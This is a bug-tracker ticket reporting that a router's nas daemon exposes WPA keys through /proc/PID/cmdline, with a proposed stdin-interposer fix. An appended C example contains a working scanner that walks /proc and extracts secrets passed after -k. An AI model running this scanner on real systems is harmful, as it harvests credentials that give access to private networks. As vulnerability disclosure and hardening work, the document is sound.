nas daemon leaks WPA secrets on R7000
Reported by: jpap00 | Owned by:
On R7000 there is a closed-source nas daemon that leaks the WPA passwords associated with each wireless interface, by having them exposed on its command line:
nas -P /tmp/nas.wl1lan.pid -H 34954 -l br0 -i eth2 -A -m 128 -k [WPASECRET] -s home2N -w 2 -g 3600
nas -P /tmp/nas.wl0lan.pid -H 34954 -l br0 -i eth1 -A -m 128 -k [WPASECRET] -s home2 -w 2 -g 3600
This is undesirable because all processes have read access to the /proc tree, and a vulnerability in a network daemon may result in the command line of the nas daemon being exposed via /proc/$PID/cmdline, where the attacker can guess $PID until it is found. The daemon does not have to be running as root, nor does it require shell access or equivalent. The vulnerability only requires that any process on the system be able to read a world-readable file on the filesystem.
If the attacker is in close proximity to the wireless network, they could then associate and have full unrestricted access to the private LAN.
It is desirable to hide the command-line arguments from all processes, by:
- Modifying the nas binary to accept arguments via stdin, or a configuration file. Unfortunately the nas binary is closed source, so this can only be done by BrainSlayer.
- Interposing the nas binary so that arguments can be passed via stdin without the need to modify the binary itself.
Attached is a patch that takes the second approach, utilizing a new shared object /usr/lib/interpose.so that leverages the loader to insert itself into the nas binary before it executes, to retrieve the command line arguments via a stdin pipe, passing these to the regular nas main() function as it starts up. Modifications are accordingly made to the /lib/services.so library so that the above code-path is taken when launching the
The resulting command line arguments appear to other processes as follows:
nas <redacted> nas <redacted>
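The following is an added example, not the ticket's attached patch and not DD-WRT or nas code. It shows both halves of the issue above on a stock Linux host: the attacker side, which walks /proc and pulls the value after -k out of every readable /proc/PID/cmdline exactly as the report describes, and the interposer side, which rebuilds argv from a stdin pipe so the secrets never reach the command line. The wire format (one argument per line on stdin) and the function names cmdline_option_value, scan_proc_for_option and argv_from_stream are assumptions made for this example; the loader hooking that hands the rebuilt argv to the real main() is not shown.

```c
#define _GNU_SOURCE
#include <ctype.h>
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* /proc/PID/cmdline is argv[] joined with NUL bytes (no trailing newline).
 * Return a malloc'd copy of the argument following `opt` (e.g. "-k"),
 * or NULL if `opt` is absent or is the last argument. Safe on a buffer
 * that was truncated by a short read. */
char *cmdline_option_value(const char *buf, size_t len, const char *opt)
{
    size_t optlen = strlen(opt);
    size_t i = 0;
    while (i < len) {
        const char *arg = buf + i;
        size_t alen = strnlen(arg, len - i);   /* bounded: arg may be unterminated */
        size_t next = i + alen + 1;            /* skip the NUL separator */
        if (alen == optlen && memcmp(arg, opt, optlen) == 0 && next < len)
            return strndup(buf + next, len - next);
        i = next;
    }
    return NULL;
}

/* Attacker side. Walk /proc and report every process whose argv carries
 * `opt`. Only reading world-readable files is needed: no root, no shell.
 * Returns the number of exposing processes, or -1 if /proc is unavailable. */
int scan_proc_for_option(const char *opt, FILE *report)
{
    DIR *d = opendir("/proc");
    if (d == NULL)
        return -1;
    int hits = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        if (!isdigit((unsigned char)e->d_name[0]))
            continue;                          /* not a PID directory */
        char path[64], buf[4096];
        snprintf(path, sizeof path, "/proc/%s/cmdline", e->d_name);
        FILE *f = fopen(path, "rb");
        if (f == NULL)
            continue;                          /* process exited, or hidden by hidepid */
        size_t n = fread(buf, 1, sizeof buf, f);
        fclose(f);
        char *val = cmdline_option_value(buf, n, opt);
        if (val != NULL) {
            hits++;
            fprintf(report, "pid %s exposes %s %s\n", e->d_name, opt, val);
            free(val);
        }
    }
    closedir(d);
    return hits;
}

/* Interposer side. Rebuild argv from a stream instead of the real command
 * line, so secrets never appear in /proc/PID/cmdline. Assumed wire format
 * (this example's choice): one argument per line, blank lines ignored.
 * Returns a NULL-terminated heap argv with argv[0] = argv0; *argc_out
 * receives its length. */
char **argv_from_stream(FILE *in, const char *argv0, int *argc_out)
{
    size_t cap = 8, n = 0;
    char **argv = malloc(cap * sizeof *argv);
    char line[1024];
    argv[n++] = strdup(argv0);
    while (fgets(line, sizeof line, in) != NULL) {
        line[strcspn(line, "\r\n")] = '\0';
        if (line[0] == '\0')
            continue;
        if (n + 1 >= cap) {
            cap *= 2;
            argv = realloc(argv, cap * sizeof *argv);
        }
        argv[n++] = strdup(line);
    }
    argv[n] = NULL;
    *argc_out = (int)n;
    return argv;
}

void free_argv(char **argv)
{
    for (char **p = argv; *p != NULL; p++)
        free(*p);
    free(argv);
}

/* Demo: report which processes on this host expose "-k", then rebuild an
 * argv from whatever is piped in on stdin, as the interposer would. */
int main(void)
{
    int hits = scan_proc_for_option("-k", stdout);
    printf("%d process(es) expose -k on their command line\n", hits);
    int argc;
    char **argv = argv_from_stream(stdin, "nas", &argc);
    printf("rebuilt argc=%d, argv[1]=%s\n", argc, argc > 1 ? argv[1] : "(none)");
    free_argv(argv);
    return 0;
}
```

Run it as an unprivileged user with something like `printf -- '-k\nsecret\n' | ./a.out`: the scan needs no special rights, which is the point of the report. Mounting /proc with hidepid=2 makes /proc/PID of other users' processes unreadable and would blunt the scan when nas runs as a different uid than the compromised daemon, but it does nothing for a process running as the same uid or as root, so keeping the secret off the command line is the more robust fix.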